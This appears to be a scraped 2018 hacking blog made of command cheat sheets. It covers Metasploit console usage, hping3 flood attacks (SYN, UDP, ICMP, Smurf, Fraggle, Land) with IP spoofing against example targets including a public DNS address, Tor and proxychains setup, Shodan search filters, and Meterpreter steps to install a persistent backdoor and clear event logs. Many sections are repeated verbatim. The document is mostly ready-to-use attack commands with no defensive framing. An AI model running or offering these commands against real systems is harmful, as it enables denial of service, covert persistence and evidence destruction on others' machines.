Search for module:
msf > search [regex]
Show all Exploits:
msf > show exploits
Specify and exploit to use:
msf > use [ExploitPath]
Show all Payloads:
msf > show payloads
Specify a Payload to use:
msf > set payload [PayloadPath]
Show all Targets:
msf > show targets
Specify a Target to use:
msf > set target [TargetNumber]
Show all Encoders:
msf > show encoders
Specify a Encoder to use:
msf > set encoder [EncoderPath]
Show options for the current modules:
msf > show options
Set options:
msf > set [Option] [Value]
Start exploit:
msf > exploit
msf > run
Tuesday, May 29, 2018
Saturday, May 26, 2018
Utilizing Hping3 to launch Denial of Service (DoS) attacks
Documenting this post is for a convenient purpose. However, it does not cover some typical Denial of Service (DoS) attacks such as Ping of Death and Teardrop.
SYN Flood:
hping3 -V -c 1000000 -d 120 -S -w 64 -p (Victim Port) -s (Source Port) --flood --rand-source (Victim IP)
Example:
hping3 -V -c 1000000 -d 120 -S -w 64 -p 80 -s 1025 --flood --rand-source test.freeddns.org
Explanation:
-V:Verbose Mode
-c:Packet Count
-d:Data Size
-S:Syn
-w:Window Size
-p:Destination Port
-s:Source Base Port
--flood:Flood Mode
--rand-source:IP Spoofing
UDP Flood:
hping3 --flood --rand-source --udp -p (Victim Port) (Victim IP)
Example:
hping3 --flood --rand-source --udp -p 53 8.8.4.4
Explanation:
--flood:Flood Mode
--rand-source:IP Spoofing
--udp:UDP Mode
-p:Destination Port
ICMP Flood:
hping3 -1 --flood --rand-source (Victim IP)
Example:
hping3 -1 --flood --rand-source 192.168.0.88
-1:ICMP
--flood:Flood Mode
--rand-source:IP Spoofing
Smurf:
hping3 -1 --flood -a (Victim IP) (Broadcast IP)
Example:
hping3 -1 --flood -a 192.168.0.3 192.168.0.255
Explanation:
-1:ICMP
--flood:Flood Mode
-a:The Source IP or Host
Fraggle:
hping3 --udp --flood -p 7 -s 7 -k -a (Victim IP) (Broadcast IP)
Example:
hping3 --udp --flood -p 7 -s 7 -k -a 192.168.0.3 192.168.0.255
Explanation:
--udp:UDP
--flood:Flood Mode
-p:Destination Port
-s:Source Base Port
-k:Keep the source port the same
-a:The Source IP or Host
Land:
hping3 -V -c 1000000 -d 120 -S -w 64 -p (Victim Port) -s (Victim Port) -k -a (Victim IP) --flood (Victim IP)
Example:
hping3 -V -c 1000000 -d 120 -S -w 64 -p 80 -s 80 -k -a demonalex.freeddns.org --flood demonalex.freeddns.org
Explanation:
-V:Verbose Mode
-c:Packet Count
-d:Data Size
-S:Syn
-w:Window Size
-p:Destination Port
-s:Source Base Port
-k:Keep the source port the same
-a:The Source IP or Host
--flood:Flood Mode
References:
http://0daysecurity.com/articles/hping3_examples.html
http://www.hackingarticles.in/dos-penetration-testing-part-1/
http://www.iv2-technologies.com/DOSAttacks.pdf
https://neelpathak.wordpress.com/tag/hping3-tutorials/
http://blognyajohny.blogspot.com/2014/04/ddos-attack-using-hping-command-in-kali.html
https://www.blackmoreops.com/2015/04/21/denial-of-service-attack-dos-using-hping3-with-spoofed-ip-in-kali-linux/
SYN Flood:
hping3 -V -c 1000000 -d 120 -S -w 64 -p (Victim Port) -s (Source Port) --flood --rand-source (Victim IP)
Example:
hping3 -V -c 1000000 -d 120 -S -w 64 -p 80 -s 1025 --flood --rand-source test.freeddns.org
Explanation:
-V:Verbose Mode
-c:Packet Count
-d:Data Size
-S:Syn
-w:Window Size
-p:Destination Port
-s:Source Base Port
--flood:Flood Mode
--rand-source:IP Spoofing
UDP Flood:
hping3 --flood --rand-source --udp -p (Victim Port) (Victim IP)
Example:
hping3 --flood --rand-source --udp -p 53 8.8.4.4
Explanation:
--flood:Flood Mode
--rand-source:IP Spoofing
--udp:UDP Mode
-p:Destination Port
ICMP Flood:
hping3 -1 --flood --rand-source (Victim IP)
Example:
hping3 -1 --flood --rand-source 192.168.0.88
-1:ICMP
--flood:Flood Mode
--rand-source:IP Spoofing
Smurf:
hping3 -1 --flood -a (Victim IP) (Broadcast IP)
Example:
hping3 -1 --flood -a 192.168.0.3 192.168.0.255
Explanation:
-1:ICMP
--flood:Flood Mode
-a:The Source IP or Host
Fraggle:
hping3 --udp --flood -p 7 -s 7 -k -a (Victim IP) (Broadcast IP)
Example:
hping3 --udp --flood -p 7 -s 7 -k -a 192.168.0.3 192.168.0.255
Explanation:
--udp:UDP
--flood:Flood Mode
-p:Destination Port
-s:Source Base Port
-k:Keep the source port the same
-a:The Source IP or Host
Land:
hping3 -V -c 1000000 -d 120 -S -w 64 -p (Victim Port) -s (Victim Port) -k -a (Victim IP) --flood (Victim IP)
Example:
hping3 -V -c 1000000 -d 120 -S -w 64 -p 80 -s 80 -k -a demonalex.freeddns.org --flood demonalex.freeddns.org
Explanation:
-V:Verbose Mode
-c:Packet Count
-d:Data Size
-S:Syn
-w:Window Size
-p:Destination Port
-s:Source Base Port
-k:Keep the source port the same
-a:The Source IP or Host
--flood:Flood Mode
References:
http://0daysecurity.com/articles/hping3_examples.html
http://www.hackingarticles.in/dos-penetration-testing-part-1/
http://www.iv2-technologies.com/DOSAttacks.pdf
https://neelpathak.wordpress.com/tag/hping3-tutorials/
http://blognyajohny.blogspot.com/2014/04/ddos-attack-using-hping-command-in-kali.html
https://www.blackmoreops.com/2015/04/21/denial-of-service-attack-dos-using-hping3-with-spoofed-ip-in-kali-linux/
Tuesday, May 22, 2018
Apply SOCKS Proxy (e.g. Tor) to Linux Shell terminal by using Proxychains
1) Turn on SOCKS Proxy such as Tor service
2) vi /etc/proxychains.conf
3) Add the following line to the end of proxychains.conf
socks5 127.0.0.1 9150
4) Execute the command below in order to verify whether the IP address has been changed
proxychains wget -qO- v4.ifconfig.co
2) vi /etc/proxychains.conf
3) Add the following line to the end of proxychains.conf
socks5 127.0.0.1 9150
4) Execute the command below in order to verify whether the IP address has been changed
proxychains wget -qO- v4.ifconfig.co
Leverage Tor as a SOCKS proxy
After the Tor Browser is executed, point the SOCKS Proxy of the underlying operating system to "127.0.0.1:9150".
P.S.: When the Tor Browser is ended up, the SOCKS Proxy service will be shut down at the same time.
P.S.: When the Tor Browser is ended up, the SOCKS Proxy service will be shut down at the same time.
Install and configure Tor
1) Download Tor Browser from https://www.torproject.org/download/download-easy.html.en
2) Move the *.tar.xz file to /usr/local/sbin
3) Execute the commands below
#cd /usr/local/sbin
#tar -xvf ./tor-browser-linux32-7.5.4_en-US.tar.xz
#cd tor-browser_en-US/Browser
#vi ./start-tor-browser
4) Comment the lines below before saving and exiting the vi
if [ "`id -u`" -eq 0 ]; then
complain "The Tor Browser Bundle should not be run as root. Exiting."
exit 1
fi
5) Run the command below
#/usr/local/sbin/tor-browser_en-US/Browser/start-tor-browser
2) Move the *.tar.xz file to /usr/local/sbin
3) Execute the commands below
#cd /usr/local/sbin
#tar -xvf ./tor-browser-linux32-7.5.4_en-US.tar.xz
#cd tor-browser_en-US/Browser
#vi ./start-tor-browser
4) Comment the lines below before saving and exiting the vi
if [ "`id -u`" -eq 0 ]; then
complain "The Tor Browser Bundle should not be run as root. Exiting."
exit 1
fi
5) Run the command below
#/usr/local/sbin/tor-browser_en-US/Browser/start-tor-browser
Monday, May 21, 2018
Some examples regarding Shodan's keywords
[Geography]
country:US
city:Guangzhou
geo:33.5,36.3
[Time]
before:01/01/2014
after:01/01/2014
[Network and System Scan]
net:216.0.0.0/16
port:443
os:"windows 2003"
[Site and Page Scan]
hostname:google.com
title:"Server Room"
[Exclusion]
-port:80
country:US
city:Guangzhou
geo:33.5,36.3
[Time]
before:01/01/2014
after:01/01/2014
[Network and System Scan]
net:216.0.0.0/16
port:443
os:"windows 2003"
[Site and Page Scan]
hostname:google.com
title:"Server Room"
[Exclusion]
-port:80
Some common use cases of Meterpreter
Install a persistent backdoor:
meterpreter>ps
When locating the explorer.exe (suppose the process ID of the explorer.exe is 623), execute the command below:
meterpreter>migrate 623
meterpreter>run metsvc
Connect to the metsvc (suppose the victim owns the IP address, 192.168.1.104):
msf>use exploit/multi/handler
msf exploit(handler)>set PAYLOAD windows/metsvc_bind_tcp
msf exploit(handler)>set LPORT 31337
msf exploit(handler)>set RHOST 192.168.1.104
msf exploit(handler)>show options
msf exploit(handler)>run
Clean all Event Log:
meterpreter>clearev
meterpreter>ps
When locating the explorer.exe (suppose the process ID of the explorer.exe is 623), execute the command below:
meterpreter>migrate 623
meterpreter>run metsvc
Connect to the metsvc (suppose the victim owns the IP address, 192.168.1.104):
msf>use exploit/multi/handler
msf exploit(handler)>set PAYLOAD windows/metsvc_bind_tcp
msf exploit(handler)>set LPORT 31337
msf exploit(handler)>set RHOST 192.168.1.104
msf exploit(handler)>show options
msf exploit(handler)>run
Clean all Event Log:
meterpreter>clearev
Sunday, May 13, 2018
Saturday, May 12, 2018
Subscribe to:
Posts (Atom)